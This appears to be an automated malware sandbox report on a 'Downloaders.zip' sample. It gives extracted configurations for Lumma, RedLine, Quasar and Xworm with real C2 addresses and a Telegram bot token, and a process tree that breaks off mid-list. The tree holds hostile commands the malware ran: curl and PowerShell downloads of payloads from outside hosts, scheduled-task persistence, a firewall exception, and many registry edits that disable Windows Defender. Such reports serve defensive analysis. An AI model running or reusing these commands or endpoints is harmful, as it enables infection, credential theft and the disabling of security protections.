Resubmissions

28-11-2024 02:19

241128-cr9sks1kht 10

27-11-2024 21:08

241127-zyzyaawqgn 10

27-11-2024 20:16

241127-y145caymbs 10

27-11-2024 20:13

241127-yzlxdavlen 10

27-11-2024 19:53

241127-yl61dsxpcs 10

27-11-2024 19:38

241127-ycrjcaxkfx 10

27-11-2024 19:03

241127-xqsswsslej 10

27-11-2024 19:03

241127-xqf44aslcr 3

27-11-2024 19:02

241127-xpxqfsslan 3

27-11-2024 18:32

241127-w6pkqs1mek 10

Analysis

  • max time kernel
    101s
  • max time network
    123s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    26-11-2024 22:59

General

  • Target

    Downloaders.zip

  • Size

    12KB

  • MD5

    94fe78dc42e3403d06477f995770733c

  • SHA1

    ea6ba4a14bab2a976d62ea7ddd4940ec90560586

  • SHA256

    16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

  • SHA512

    add85726e7d2c69068381688fe84defe820f600e6214eff029042e3002e9f4ad52dde3b8bb28f4148cca1b950cd54d3999ce9e8445c4562d1ef2efdb1c6bdeff

  • SSDEEP

    384:6BfwcSEp9ZjKXSBIDv4dDfjlMJ7HWTHWB:efACW6Dr8HWTHWB

Malware Config

Extracted

Family

lumma

C2

https://weiggheticulop.shop/api

https://consciousourwi.shop/api

https://southedhiscuso.shop/api

https://deicedosmzj.shop/api

https://cagedwifedsozm.shop/api

https://charecteristicdxp.shop/api

https://interactiedovspm.shop/api

https://potentioallykeos.shop/api

https://weaknessmznxo.shop/api

Extracted

Family

redline

Botnet

Diamotrix

C2

176.111.174.140:1912

Extracted

Family

quasar

Version

1.4.1

Botnet

Java

C2

dez345-37245.portmap.host:37245

Mutex

f0e53bcd-851e-44af-8fd5-07d8ab5ed968

Attributes
  • encryption_key

    65439CE7DEF3E0FAF01C526FEA90388C9FD487A1

  • install_name

    java.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    java ©

  • subdirectory

    Programfiles

Extracted

Family

quasar

Version

1.4.1

Botnet

Kurban

C2

89.213.56.109:80

89.213.56.109:4782

Mutex

98b3deca-7447-4862-905a-28f904856d31

Attributes
  • encryption_key

    705A067280199C09F2EC77A633F5E68C9020B7B5

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Extracted

Family

xworm

Version

3.1

Attributes
  • Install_directory

    %Port%

  • install_file

    USB.exe

Extracted

Family

xworm

C2

127.0.0.1:6000

103.211.201.109:6000

Attributes
  • Install_directory

    %AppData%

  • install_file

    XClient.exe

  • telegram

    https://api.telegram.org/bot7929370892:AAGwrX5TeyxQidZdAEm_Z6-CDvPUOQzVY1M

Signatures

  • Detect Xworm Payload 4 IoCs
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 13 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 3 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • NanoCore

    NanoCore is a remote access tool (RAT) with a variety of capabilities.

  • Nanocore family
  • Njrat family
  • Phorphiex family
  • Phorphiex payload 1 IoCs
  • Phorphiex, Phorpiex

    Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 4 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • Redline family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Powershell Invoke Web Request.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 35 IoCs
  • Loads dropped DLL 27 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 6 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies Security services 2 TTPs 4 IoCs

    Modifies the startup behavior of a security service.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Detects Pyinstaller 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 4 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 40 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • cURL User-Agent 2 IoCs

    Uses User-Agent string associated with cURL utility.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3564
    • C:\Program Files\7-Zip\7zFM.exe
      "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Downloaders.zip"
      2⤵
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:3616
      • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\4363463463464363463463463.exe
        "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\4363463463464363463463463.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3972
        • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Armanivenntii_crypted_EASY.exe
          "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Armanivenntii_crypted_EASY.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:2624
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of SetWindowsHookEx
            PID:792
        • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\loader.exe
          "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\loader.exe"
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2760
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c "payload.bat"
            5⤵
            • Checks computer location settings
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4036
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c wmic path Win32_PointingDevice get PNPDeviceID /value | find "PNPDeviceID"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3484
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path Win32_PointingDevice get PNPDeviceID /value
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1100
              • C:\Windows\system32\find.exe
                find "PNPDeviceID"
                7⤵
                  PID:2500
              • C:\Windows\system32\curl.exe
                curl -L -o python-installer.exe https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe --insecure --silent
                6⤵
                  PID:2536
                • C:\Windows\system32\curl.exe
                  curl -o webpage.py -s https://rentry.co/sntwm349/raw --insecure
                  6⤵
                    PID:1612
              • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Server.exe
                "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Server.exe"
                4⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4544
                • C:\Users\Admin\AppData\Local\Temp\server.exe
                  "C:\Users\Admin\AppData\Local\Temp\server.exe"
                  5⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1148
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                    6⤵
                    • Modifies Windows Firewall
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:772
              • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Setup.exe
                "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Setup.exe"
                4⤵
                • Drops startup file
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2872
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                  5⤵
                  • Drops file in Drivers directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:3372
              • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\AmLzNi.exe
                "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\AmLzNi.exe"
                4⤵
                • Executes dropped EXE
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:3980
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:3320
              • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\TigerHulk3.exe
                "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\TigerHulk3.exe"
                4⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Checks whether UAC is enabled
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of SetWindowsHookEx
                PID:3848
              • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Authenticator.exe
                "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Authenticator.exe"
                4⤵
                • Executes dropped EXE
                • Suspicious use of SetWindowsHookEx
                PID:3580
              • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\nano.exe
                "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\nano.exe"
                4⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Checks whether UAC is enabled
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: GetForegroundWindowSpam
                PID:2272
              • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Java32.exe
                "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\Java32.exe"
                4⤵
                • Executes dropped EXE
                PID:5100
                • C:\Windows\SYSTEM32\schtasks.exe
                  "schtasks" /create /tn "java ©" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Programfiles\java.exe" /rl HIGHEST /f
                  5⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:3280
                • C:\Users\Admin\AppData\Roaming\Programfiles\java.exe
                  "C:\Users\Admin\AppData\Roaming\Programfiles\java.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SetWindowsHookEx
                  PID:1168
                  • C:\Windows\SYSTEM32\schtasks.exe
                    "schtasks" /create /tn "java ©" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Programfiles\java.exe" /rl HIGHEST /f
                    6⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:4812
              • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\DiscordSpotifyBypass.exe
                "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\DiscordSpotifyBypass.exe"
                4⤵
                • Executes dropped EXE
                • Suspicious use of SetWindowsHookEx
                PID:1452
                • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\DiscordSpotifyBypass.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\DiscordSpotifyBypass.exe"
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetWindowsHookEx
                  PID:2292
              • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\r.exe
                "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\r.exe"
                4⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of SetWindowsHookEx
                PID:4756
                • C:\Windows\sysnldcvmr.exe
                  C:\Windows\sysnldcvmr.exe
                  5⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: SetClipboardViewer
                  PID:4068
                  • C:\Users\Admin\AppData\Local\Temp\2855720420.exe
                    C:\Users\Admin\AppData\Local\Temp\2855720420.exe
                    6⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    PID:4320
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                      7⤵
                        PID:2056
                        • C:\Windows\system32\reg.exe
                          reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                          8⤵
                            PID:4416
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                          7⤵
                            PID:5076
                            • C:\Windows\system32\schtasks.exe
                              schtasks /delete /f /tn "Windows Upgrade Manager"
                              8⤵
                                PID:904
                          • C:\Users\Admin\AppData\Local\Temp\100338673.exe
                            C:\Users\Admin\AppData\Local\Temp\100338673.exe
                            6⤵
                            • Executes dropped EXE
                            PID:4908
                            • C:\Users\Admin\AppData\Local\Temp\2668931653.exe
                              C:\Users\Admin\AppData\Local\Temp\2668931653.exe
                              7⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              PID:2728
                          • C:\Users\Admin\AppData\Local\Temp\198243764.exe
                            C:\Users\Admin\AppData\Local\Temp\198243764.exe
                            6⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:3732
                          • C:\Users\Admin\AppData\Local\Temp\665325503.exe
                            C:\Users\Admin\AppData\Local\Temp\665325503.exe
                            6⤵
                            • Executes dropped EXE
                            PID:4400
                            • C:\Users\Admin\AppData\Local\Temp\3200919441.exe
                              C:\Users\Admin\AppData\Local\Temp\3200919441.exe
                              7⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:2340
                      • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\ardara.exe
                        "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\ardara.exe"
                        4⤵
                        • Executes dropped EXE
                        PID:1976
                        • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                          "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SetWindowsHookEx
                          PID:988
                      • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\run2.exe
                        "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\run2.exe"
                        4⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Suspicious use of SetWindowsHookEx
                        PID:4372
                        • C:\Windows\system32\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C251.tmp\C252.tmp\C253.bat C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\run2.exe"
                          5⤵
                            PID:1700
                            • C:\Windows\system32\takeown.exe
                              takeown /F "C:\windows\system32\userinit.exe"
                              6⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:3356
                            • C:\Windows\system32\icacls.exe
                              icacls "C:\windows\system32\userinit.exe" /grant administrators:F
                              6⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:2056
                            • C:\Windows\system32\timeout.exe
                              TIMEOUT /T 10
                              6⤵
                              • Delays execution with timeout.exe
                              PID:4784
                        • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\test23.exe
                          "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\test23.exe"
                          4⤵
                          • Executes dropped EXE
                          PID:556
                        • C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\ev.exe
                          "C:\Users\Admin\AppData\Local\Temp\7zO02E3FBE7\Files\ev.exe"
                          4⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of SetWindowsHookEx
                          PID:3140
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
                            5⤵
                              PID:4480
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
                                6⤵
                                • Modifies Windows Defender notification settings
                                • System Location Discovery: System Language Discovery
                                PID:3676
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications " /t REG_DWORD /d "1" /f
                              5⤵
                                PID:2948
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications " /t REG_DWORD /d "1" /f
                                  6⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4612
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:3644
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
                                  6⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2588
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:3624
                                • C:\Windows\SysWOW64\reg.exe
                                  reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                  6⤵
                                  • Modifies Windows Defender Real-time Protection settings
                                  • System Location Discovery: System Language Discovery
                                  PID:1632
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f
                                5⤵
                                  PID:960
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1428
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4484
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                    6⤵
                                      PID:4036
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                    5⤵
                                      PID:3364
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                        6⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4136
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f
                                      5⤵
                                        PID:1164
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f
                                          6⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:3620
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f
                                        5⤵
                                          PID:2156
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f
                                            6⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4948
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                          5⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4368
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                            6⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:5004
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                          5⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4576
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                            6⤵
                                            • Modifies Windows Defender Real-time Protection settings
                                            • System Location Discovery: System Language Discovery
                                            PID:4816
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                          5⤵
                                            PID:540
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                              6⤵
                                              • Modifies Windows Defender Real-time Protection settings
                                              • System Location Discovery: System Language Discovery
                                              PID:568
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                            5⤵
                                              PID:2232
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                6⤵
                                                • Modifies Windows Defender Real-time Protection settings
                                                • System Location Discovery: System Language Discovery
                                                PID:2716
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                              5⤵
                                                PID:4940
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                  6⤵
                                                  • Modifies Windows Defender Real-time Protection settings
                                                  • System Location Discovery: System Language Discovery
                                                  PID:552
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:3552
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
                                                  6⤵
                                                  • Modifies Windows Defender Real-time Protection settings
                                                  PID:3144
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                5⤵
                                                  PID:2340
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                    6⤵
                                                    • Modifies Windows Defender Real-time Protection settings
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1096
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                  5⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3232
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                    6⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1872
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                  5⤵
                                                    PID:2012
                                                    • C:\Windows\System32\Conhost.exe
                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      6⤵
                                                        PID:3676
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                        6⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:4604
                                                    • C:\Windows\SysWOW64\cmd.exe
